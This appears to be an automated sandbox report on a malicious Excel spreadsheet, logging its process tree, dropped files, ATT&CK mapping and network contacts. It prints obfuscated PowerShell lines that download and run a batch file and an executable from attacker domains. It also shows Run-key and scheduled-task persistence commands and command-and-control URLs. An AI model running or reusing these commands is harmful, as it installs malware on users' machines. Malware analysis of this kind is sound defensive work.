            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
            Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmpBinary or memory string: q#"SOFTWARE\VMware, Inc.\VMware ToolsH
            Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmpBinary or memory string: vmwareH
            Source: powershell.exe, 0000000E.00000002.2115086772.00000000003B6000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
            Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmpBinary or memory string: q&%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\H
            Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmpBinary or memory string: VMWAREH
            Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmpBinary or memory string: VMWARE
            Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIH
            Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmpBinary or memory string: q#"SOFTWARE\VMware, Inc.\VMware Tools
            Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmpBinary or memory string: qA"SOFTWARE\VMware, Inc.\VMware Tools
            Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmpBinary or memory string: q87HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware Tools\.
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_004F1750 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 27_2_00401179 SetUnhandledExceptionFilter,
            Source: C:\Users\user\AppData\Local\Temp\ps.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 172.67.167.122 80
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\AppData\Local\Temp\ps.exeMemory written: C:\Users\user\AppData\Local\Temp\ps.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Users\user\AppData\Roaming\svchost.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 18,1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\ps.exe 'C:\Users\user\AppData\Local\Temp\ps.exe'
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess created: C:\Users\user\AppData\Local\Temp\ps.exe C:\Users\user\AppData\Local\Temp\ps.exe
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
            Source: C:\Users\user\AppData\Local\Temp\ps.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe 'C:\Users\user\AppData\Roaming\svchost.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmp121B.tmp'
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: unknown unknown

            Language, Device and Operating System Detection:

            barindex
            Yara detected Obfuscated PowershellShow sources
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: C:\Users\user\Documents\pd.bat, type: DROPPED
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 24_2_00AD079A GetUserNameA,
            Source: C:\Users\user\AppData\Local\Temp\ps.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 BlobJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\System32\attrib.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\System32\attrib.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\System32\cmd.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\System32\cmd.exeDirectory queried: C:\Users\user\Documents

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation1Scheduled Task/Job1Access Token Manipulation1Disable or Modify Tools111OS Credential DumpingAccount Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting311Registry Run Keys / Startup Folder1Process Injection211Deobfuscate/Decode Files or Information11LSASS MemoryFile and Directory Discovery12Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsNative API1Logon Script (Windows)Scheduled Task/Job1Scripting311Security Account ManagerSystem Information Discovery13SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsExploitation for Client Execution13Logon Script (Mac)Registry Run Keys / Startup Folder1Obfuscated Files or Information4NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCommand and Scripting Interpreter11Network Logon ScriptNetwork Logon ScriptSoftware Packing12LSA SecretsSecurity Software Discovery311SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaScheduled Task/Job1Rc.commonRc.commonMasquerading11Cached Domain CredentialsVirtualization/Sandbox Evasion13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesPowerShell2Startup ItemsStartup ItemsModify Registry1DCSyncProcess Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion13Proc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection211Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 335896 Sample: 1e9b445cb987e5a1cb3d15e6fd6... Startdate: 04/01/2021 Architecture: WINDOWS Score: 100 90 cryptodual.net 2->90 100 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->100 102 Malicious sample detected (through community Yara rule) 2->102 104 Sigma detected: Scheduled temp file as task from temp location 2->104 106 16 other signatures 2->106 15 EXCEL.EXE 86 29 2->15         started        18 svchost.exe 2->18         started        20 svchost.exe 2->20         started        signatures3 process4 signatures5 130 Obfuscated command line found 15->130 132 Document exploit detected (process start blacklist hit) 15->132 22 cmd.exe 15->22         started        24 cmd.exe 15->24         started        27 cmd.exe 15->27         started        29 2 other processes 15->29 process6 signatures7 31 powershell.exe 7 22->31         started        118 Obfuscated command line found 24->118 33 powershell.exe 16 10 24->33         started        37 powershell.exe 6 27->37         started        40 powershell.exe 7 29->40         started        42 powershell.exe 7 29->42         started        process8 dnsIp9 44 cmd.exe 31->44         started        86 cutt.ly 172.67.8.238, 443, 49167 CLOUDFLARENETUS United States 33->86 88 37.46.150.139, 49169, 80 IWAYCH Moldova Republic of 33->88 78 C:\Users\user\Documents\pd.bat, ASCII 33->78 dropped 108 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 37->108 110 Powershell drops PE file 37->110 47 attrib.exe 40->47         started        file10 signatures11 process12 signatures13 120 Obfuscated command line found 44->120 49 cmd.exe 44->49         started        52 mode.com 44->52         started        54 cmd.exe 44->54         started        process14 signatures15 94 Suspicious powershell command line found 49->94 96 Tries to download and execute files (via powershell) 49->96 56 powershell.exe 8 49->56         started        98 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 52->98 process16 dnsIp17 92 cryptodual.net 172.67.167.122, 443, 49170, 49171 CLOUDFLARENETUS United States 56->92 80 C:\Users\user\AppData\Local\Temp\ps.exe, PE32 56->80 dropped 60 ps.exe 5 56->60         started        file18 process19 file20 82 C:\Users\user\AppData\...behaviorgraphvthaHtVzpRh.exe, PE32 60->82 dropped 84 C:\Users\user\AppData\Local\...\tmpEDF8.tmp, XML 60->84 dropped 122 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 60->122 124 Machine Learning detection for dropped file 60->124 126 Drops PE files with benign system names 60->126 128 Injects a PE file into a foreign processes 60->128 64 ps.exe 2 60->64         started        67 schtasks.exe 60->67         started        signatures21 process22 file23 76 C:\Users\user\AppData\Roaming\svchost.exe, PE32 64->76 dropped 69 svchost.exe 64->69         started        72 cmd.exe 64->72         started        process24 signatures25 112 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 69->112 114 Machine Learning detection for dropped file 69->114 116 Injects a PE file into a foreign processes 69->116 74 reg.exe 72->74         started        process26

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls5%VirustotalBrowse

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\svchost.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\GvthaHtVzpRh.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\ps.exe100%Joe Sandbox ML

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            27.2.ps.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            36.2.svchost.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://cryptodual.net/cc/gate.php0%Avira URL Cloudsafe
            http://www.piriform.c0%Avira URL Cloudsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://cryptodual.net/cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command0%Avira URL Cloudsafe
            http://37.46.150.139/bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            cutt.ly
            172.67.8.238
            truetrue
              unknown
              cryptodual.net
              172.67.167.122
              truetrue
                unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://cryptodual.net/cc/gate.phptrue
                • Avira URL Cloud: safe
                unknown
                http://cryptodual.net/cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_commandtrue
                • Avira URL Cloud: safe
                unknown
                http://37.46.150.139/bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.batfalse
                • Avira URL Cloud: safe
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.piriform.com/ccleanerpowershell.exe, 0000000A.00000002.2135991543.0000000000365000.00000004.00000020.sdmpfalse
                  high
                  http://www.piriform.cpowershell.exe, 0000000E.00000002.2115049708.000000000036E000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.%s.comPApowershell.exe, 00000007.00000002.2119050234.00000000022F0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2137769628.00000000022B0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2115698052.0000000002270000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  low
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000007.00000002.2119050234.00000000022F0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2137769628.00000000022B0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2115698052.0000000002270000.00000002.00000001.sdmpfalse
                    high
                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000007.00000002.2116902605.00000000001DE000.00000004.00000020.sdmp, powershell.exe, 0000000A.00000002.2135991543.0000000000365000.00000004.00000020.sdmpfalse
                      high
                      http://www.piriform.com/ccleanenTZpowershell.exe, 00000007.00000002.2117026131.000000000020A000.00000004.00000020.sdmpfalse
                        high

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        172.67.8.238
                        unknownUnited States
                        13335CLOUDFLARENETUStrue
                        172.67.167.122
                        unknownUnited States
                        13335CLOUDFLARENETUStrue
                        37.46.150.139
                        unknownMoldova Republic of
                        8758IWAYCHfalse

                        General Information

                        Joe Sandbox Version:31.0.0 Red Diamond
                        Analysis ID:335896
                        Start date:04.01.2021
                        Start time:19:14:25
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 13m 15s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:40
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.expl.evad.winXLS@60/23@4/3
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 0.1% (good quality ratio 0.1%)
                        • Quality average: 55.9%
                        • Quality standard deviation: 20.6%
                        HCA Information:
                        • Successful, ratio: 92%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .xls
                        • Changed system and user locale, location and keyboard layout to French - France
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Scroll down
                        • Close Viewer
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                        • HTTP Packets have been reduced
